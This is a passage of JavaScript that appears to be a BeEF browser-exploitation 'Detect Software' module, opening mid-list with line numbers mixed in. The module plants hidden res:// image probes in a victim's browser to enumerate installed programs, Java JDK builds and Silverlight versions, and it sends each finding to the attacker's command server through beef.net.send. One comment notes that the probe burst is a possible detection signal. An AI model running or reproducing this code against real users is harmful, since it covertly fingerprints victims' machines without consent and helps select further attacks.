["Microsoft Outlook 2003", "Microsoft Office\\OFFICE11\\OUTLOOK.EXE/16/1"],
557
["Microsoft Outlook 2007", "Microsoft Office\\OFFICE12\\OUTLOOK.EXE/16/1"],
558
["Microsoft Outlook 2010", "Microsoft Office\\OFFICE14\\OUTLOOK.EXE/16/1"],
559
["Yahoo Messenger", "Yahoo!\\Messenger\\YahooMessenger.exe/16/1"],
560
["Yahoo Messenger 5", "Yahoo!\\Messenger\\YPager.exe/16/1"],
561
["Yahoo Messenger 6", "Yahoo!\\Messenger\\asw.d11/16/1"],
562
["Yahoo Messenger 7", "Yahoo!\\Messenger\\yxtldr.d11/16/1"],
563
["Yahoo Messenger 8", "Yahoo!\\Messenger\\P2PCE.d11/16/1"],
564
["Yahoo Messenger 9", "Yahoo!\\Messenger\\GIPSVoiceEngineDLL_MD.d11/16/1"],
565
["Yahoo Messenger 10", "Yahoo!\\Messenger\\ConnectionWizard.d11/16/1"],
566
["Flashget", "FlashGet\\flashget.exe/16/1"],
567
["Flashget", "FlashGet Network\\FlashGet 3\\Flashget3.exe/16/1"],
568
["Thunder", "Thunder Network\\Thunder\\Thunder.exe/16/1"],
569
["Thunder", "Thunder Network\\Thunder\\Program\\Thunder.exe/16/1"],
570
["Thunder", "Thunder Network\\Thunder6\\Thunder.exe/16/1"],
571
["eMule", "eMule\\emule.exe/16/1"],
572
["eMule", "easyMule2\\easyMule.exe/16/1"],
573
["BT", "BitComet\\BitComet.exe/16/1"],
574
["QDownload", "Tencent\\QQDownload\\QQDownload.exe/16/1"],
575
["BitSpirit", "BitSpirit\\BitSpirit.exe/16/1"],
576
["Serv—U", "RhinoSoft.com\\Serv—U\\Serv—U.exe/16/1"],
577
["radmin", "Radmin\\radmin.exe/16/1"],
578
579
// The following signatures were taken from AttackAPI
580
// https://code.google.com/p/attackapi/source/browse/tags/attackapi-2.5.0b/lib/dom/signatures.js
581
['L0pht Crack 5', '@stake\\LC5\\lc5.exe/#2/#102'],
582
['Adobe Acrobat 7', 'adobe\\acrobat 7.0\\acrobat\\acrobat.dll/#2/#210'],
583
['Ahead Nero', 'ahead\\nero\\nero.exe/#2/NEROSESPLASH'],
584
['Azureus', 'azureus\\uninstall.exe/#2/#110'],
585
['Cain', 'cain\\uninstal.exe/#2/#106'],
586
['Citrix', 'Citrix\\icaweb32\\mfc30.dll/#2/#30989'],
587
['PGP Desktop', 'PGP Corporation\\PGP Desktop\\PGPdesk.exe/#2/#600'],
588
['Google Toolbar', 'Google\\googleToolbar1.dll/#2/#120'],
589
['Flash MX 2004', 'Macromedia\\Flash MX 2004\\flash.exe/#2/#4395'],
590
['MSN Messenger', 'Messenger\\msmsgs.exe/#2/#607'],
591
['Microsoft Live Meeting 7', 'Microsoft Office\\live meeting 7\\console\\7.5.2302.14\\pwresources_zh_tt.dll/#2/#9006'],
592
['Microsoft Excel 2003', 'Microsoft Office\\Office11\\excel.exe/#34/#904'],
593
['Microsoft Office 2003', 'Microsoft Office\\Office11\\1033\\MSOhelp.exe/#2/201'],
594
['Microsoft Visual Studio 8', 'Microsoft Visual Studio 8\\common7\\ide\\devenv.exe/#2/#6606'],
595
['Microsoft Movie Maker', 'Movie Maker\\moviemk.exe/RT_JPG/sample1'],
596
['Picasa2', 'picasa2\\picasa2.exe/#2/#138'],
597
['Quicktime', 'quicktime\\quicktimeplayer.exe/#2/#403'],
598
['Real VNC4', 'RealVNC\\VNC4\\vncviewer.exe/#2/#120'],
599
['OLE View', 'Resource Kit\\oleview.exe/#2/#2'],
600
['Secure CRT', 'SecureCRT\\SecureCRT.exe/#2/#224'],
601
['Symantec Antivirus', 'symantec_client_security\\symantec antivirus\\vpc32.exe/#2/#157'],
602
['Ultramon', 'ultramon\\ultramondesktop.exe/#2/#108'],
603
['VMware Workstation', 'vmware\\vmware workstation\\vmware.exe/#2/#508'],
604
['Winamp', 'winamp\\winamp.exe/#2/#109'],
605
['Windows Media Player', 'Windows Media Player\\wmsetsdk.exe/#2/#249']
606
];
// 'res' pass over the software list: one image probe per signature per
// Program Files directory. A probe that loads is reported as
// "installed_software=<name>" (the name travels in the element's title);
// every probe element is removed from the hidden iframe once it settles.
// NOTE(review): the page issues the whole list of res:// image loads in one
// go, most of which can be expected to fail; that burst is likely a usable
// detection signal for defenders.
var on_software_probe_load = function() {
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_software=" + this.title);
  dom.removeChild(this);
};
var on_software_probe_error = function() {
  dom.removeChild(this);
};

beef.debug("[Detect Software] Enumerating installed software...");
for (var dir = 0; dir < program_dirs.length; dir++) {
  var res_base = "res://" + drive + ":\\" + program_dirs[dir] + "\\";
  for (var s = 0; s < software.length; s++) {
    var probe = new Image;
    probe.title = software[s][0];
    probe.src = res_base + software[s][1];
    probe.onload = on_software_probe_load;
    probe.onerror = on_software_probe_error;
    dom.appendChild(probe);
  }
}
// Enumerate Java JDK installs by guessing the versioned install folder name:
// for each Program Files directory and each listed release, update levels
// 00 through 99 are tried, so this section alone creates
// 2 directories x 3 releases x 100 levels = 600 image probes.
// A probe that loads is reported as "installed_software=Java JDK<build>".
var on_jdk_probe_load = function() {
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_software=" + this.title);
  dom.removeChild(this);
};
var on_jdk_probe_error = function() {
  dom.removeChild(this);
};

beef.debug("[Detect Software] Enumerating JDK installs...");
var java_versions = ['1.8.0', '1.7.0', '1.6.0'];
for (var dir = 0; dir < program_dirs.length; dir++) {
  for (var v = 0; v < java_versions.length; v++) {
    for (var patch_level = 0; patch_level < 100; patch_level++) {
      // Update levels are zero-padded to two digits, e.g. "1.8.0_05".
      var build = java_versions[v] + "_" + (patch_level < 10 ? '0' : '') + patch_level;
      var probe = new Image;
      probe.title = "Java JDK" + build;
      probe.src = "res://" + drive + ":\\" + program_dirs[dir] + "\\Java\\jdk" + build + "\\jre\\bin\\awt.dll/2/CHECK_BITMAP";
      probe.onload = on_jdk_probe_load;
      probe.onerror = on_jdk_probe_error;
      dom.appendChild(probe);
    }
  }
}
// Enumerate Silverlight installs: the install folder is named after the
// exact version, so each listed version is probed under each Program Files
// directory. A probe that loads is reported as
// "installed_software=Microsoft Silverlight v<version>".
beef.debug("[Detect Software] Enumerating Silverlight installs...");
var silverlight_versions = [
  '5.1.50901.0', '5.1.50709.0', '5.1.50428.0', '5.1.41212.0',
  '5.1.41105.0', '5.1.40728.0', '5.1.40416.0', '5.1.31211.0',
  '5.1.30514.0', '5.1.30214.0', '5.1.20913.0', '5.1.20513.0',
  '5.1.20125.0', '5.1.10411.0',
  '5.0.61118.0', '5.0.60818.0', '5.0.60401.0',
  '4.1.10329.0', '4.1.10111.0',
  '4.0.60831.0', '4.0.60531.0', '4.0.60310.0', '4.0.60129.0',
  '4.0.51204.0', '4.0.50917.0', '4.0.50826.0', '4.0.50524.00',
  '4.0.50401.00',
  '3.0.50611.0', '3.0.50106.00', '3.0.40818.00', '3.0.40723.00',
  '3.0.40624.00',
  '2.0.40115.00', '2.0.31005.00',
  '1.0.30715.00', '1.0.30401.00', '1.0.30109.00', '1.0.21115.00',
  '1.0.20816.00'
];

// The version string travels in the probe element's title; every probe
// element is removed from the hidden iframe once it has loaded or failed.
var on_silverlight_probe_load = function() {
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_software=Microsoft Silverlight v" + this.title);
  dom.removeChild(this);
};
var on_silverlight_probe_error = function() {
  dom.removeChild(this);
};

for (var dir = 0; dir < program_dirs.length; dir++) {
  var silverlight_root = "res://" + drive + ":\\" + program_dirs[dir] + "\\Microsoft Silverlight\\";
  for (var s = 0; s < silverlight_versions.length; s++) {
    var probe = new Image;
    probe.title = silverlight_versions[s];
    probe.src = silverlight_root + silverlight_versions[s] + "\\npctrl.dll/2/102";
    probe.onload = on_silverlight_probe_load;
    probe.onerror = on_silverlight_probe_error;
    dom.appendChild(probe);
  }
}
});